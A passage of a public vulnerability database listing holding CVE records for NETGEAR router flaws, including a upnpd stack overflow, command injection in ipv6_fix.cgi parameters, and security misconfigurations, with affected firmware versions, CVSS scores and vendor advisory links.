"ID": "CVE-2021-27239",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Multiple Routers",
"version": {
"version_data": [
{
"version_value": "firmware version 1.0.4.98"
}
]
}
}
]
},
"vendor_name": "NETGEAR"
}
]
}
},
"credit": "Anonymous",
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400 and R6700 firmware version 1.0.4.98 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upnpd service, which listens on UDP port 1900 by default. A crafted MX header field in an SSDP message can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-11851."
}
]
},
"impact": {
"cvss": {
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-121: Stack-based Buffer Overflow"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/",
"refsource": "MISC",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-21-206/"
},
{
"name": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432",
"refsource": "MISC",
"url": "https://kb.netgear.com/000062820/Security-Advisory-for-Stack-based-Buffer-Overflow-Remote-Code-Execution-Vulnerability-on-Some-Routers-PSV-2020-0432"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "99f1926a-a320-47d8-bbb5-42feb611262e",
"assignerShortName": "zdi",
"cveId": "CVE-2021-27239",
"datePublished": "2021-03-29T21:05:29",
"dateReserved": "2021-02-16T00:00:00",
"dateUpdated": "2024-08-03T20:48:16.140Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18794
Vulnerability from cvelistv5
Published
2020-04-21 18:41
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:43.947Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-21T18:41:49",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18794",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by command injection. This affects R6300v2 before 1.0.4.8_10.0.77, R6400 before 1.0.1.24, R6700 before 1.0.1.26, R7000 before 1.0.9.10, R7100LG before 1.0.0.32, R7900 before 1.0.1.18, R8000 before 1.0.3.54, R8500 before 1.0.2.100, and D6100 before 1.0.0.50_0.0.50."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000049368/Security-Advisory-for-Command-Injection-Vulnerability-on-D6100-and-Some-Routers-PSV-2017-0321"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-18794",
"datePublished": "2020-04-21T18:41:49",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T21:37:43.947Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2022-30078
Vulnerability from cvelistv5
Published
2022-09-07 18:12
Modified
2024-08-03 06:40
Severity ?
EPSS score ?
Summary
NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.netgear.com/about/security/ | x_refsource_MISC | |
| http://r6200v2.com | x_refsource_MISC | |
| https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:40:47.682Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.netgear.com/about/security/"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://r6200v2.com"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-09-07T18:12:50",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.netgear.com/about/security/"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://r6200v2.com"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2022-30078",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length parameters."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.netgear.com/about/security/",
"refsource": "MISC",
"url": "https://www.netgear.com/about/security/"
},
{
"name": "http://r6200v2.com",
"refsource": "MISC",
"url": "http://r6200v2.com"
},
{
"name": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md",
"refsource": "MISC",
"url": "https://github.com/10TG/vulnerabilities/blob/main/Netgear/CVE-2022-30078/CVE-2022-30078.md"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-30078",
"datePublished": "2022-09-07T18:12:50",
"dateReserved": "2022-05-02T00:00:00",
"dateUpdated": "2024-08-03T06:40:47.682Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2018-21230
Vulnerability from cvelistv5
Published
2020-04-24 14:26
Modified
2024-08-05 12:26
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1., JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T12:26:39.309Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1., JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-24T14:26:58",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2018-21230",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 before 1.0.0.27, D500 before 1.0.0.27, D6100 before 1.0.0.57, D6220 before 1.0.0.40, D6400 before 1.0.0.74, D7000 before 1.0.1.60, D7800 before 1.0.1.34, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.94, DGN2200Bv4 before 1.0.0.94, EX2700 before 1.0.1.42, EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6000 before 1.0.0.24, EX6100 before 1.0.2.18, EX6120 before 1.0.0.32, EX6130 before 1.0.0.22, EX6150 before 1.0.0.34_1.0.70, EX6200 before 1.0.3.82_1.1.117, EX6400 before 1.0.1.78, EX7000 before 1.0.0.56, EX7300 before 1.0.1., JNR1010v2 before 1.1.0.42, JR6150 before 1.0.1.10, JWNR2010v5 before 1.1.0.42, PR2000 before 1.0.0.22, R6050 before 1.0.1.10, R6100 before 1.0.1.16, R6220 before 1.1.0.50, R6250 before 1.0.4.14, R6300v2 before 1.0.4.12, R6400v2 before 1.0.2.34, R6700 before 1.0.1.26, R6900 before 1.0.1.26, R6900P before 1.2.0.22, R7000 before 1.0.9.6, R7000P before 1.2.0.22, R7100LG before 1.0.0.40, R7300DST before 1.0.0.54, R7500 before 1.0.0.110, R7500v2 before 1.0.3.26, R7800 before 1.0.2.44, R7900 before 1.0.1.26, R8000 before 1.0.3.48, R8300 before 1.0.2.104, R8500 before 1.0.2.104, R9000 before 1.0.3.10, WN2000RPTv3 before 1.0.1.26, WN2500RPv2 before 1.0.1.46, WN3000RPv3 before 1.0.2.66, WN3100RPv2 before 1.0.0.56, WNDR3400v3 before 1.0.1.14, WNDR3700v4 before 1.0.2.96, WNDR3700v5 before 1.1.0.54, WNDR4300 before 1.0.2.98, WNDR4300v2 before 1.0.0.48, WNDR4500v3 before 1.0.0.48, WNR1000v4 before 1.1.0.42, WNR2000v5 before 1.0.0.64, WNR2020 before 1.1.0.42, and WNR2050 before 1.1.0.42."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "NONE",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:N/C:L/I:L/PR:N/S:C/UI:R",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000055104/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2016-0117"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2018-21230",
"datePublished": "2020-04-24T14:26:58",
"dateReserved": "2020-04-20T00:00:00",
"dateUpdated": "2024-08-05T12:26:39.309Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2019-20729
Vulnerability from cvelistv5
Published
2020-04-16 19:08
Modified
2024-08-05 02:53
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48.
References
| ▼ | URL | Tags |
|---|---|---|
| https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T02:53:08.543Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:C/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-16T19:08:24",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2019-20729",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects JNDR3000 before 1.0.0.22, R6250 before 1.0.4.26, R6300v2 before 1.0.4.22, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R7000 before 1.0.9.28, R6900P before 1.3.1.26, R7000P before 1.3.1.26, R7300DST before 1.0.0.62, R7900 before 1.0.2.16, R8000 before 1.0.4.18, R7900P before 1.4.1.42, R8000P before 1.4.1.42, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WNDR3400v3 before 1.0.1.18, WNDR4500v2 before 1.0.0.68, and WNR3500Lv2 before 1.2.0.48."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:L/A:L/C:H/I:H/PR:H/S:C/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000061198/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-PSV-2017-3120"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-20729",
"datePublished": "2020-04-16T19:08:24",
"dateReserved": "2020-04-15T00:00:00",
"dateUpdated": "2024-08-05T02:53:08.543Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2017-18744
Vulnerability from cvelistv5
Published
2020-04-23 15:36
Modified
2024-08-05 21:37
Severity ?
EPSS score ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74.
References
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T21:37:42.903Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-23T15:36:15",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-18744",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects R6250 before 1.0.4.12, R6300v2 before 1.0.4.12, R6700 before 1.0.1.22, R6900 before 1.0.1.22, R7000 before 1.0.9.4, R7900 before 1.0.1.12, R8000 before 1.0.3.24, and R8500 before 1.0.2.74."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"availabilityImpact": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AC:L/AV:A/A:H/C:H/I:H/PR:N/S:U/UI:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324",
"refsource": "CONFIRM",
"url": "https://kb.netgear.com/000051511/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Routers-PSV-2017-0324"
}
]
}
}
}
},
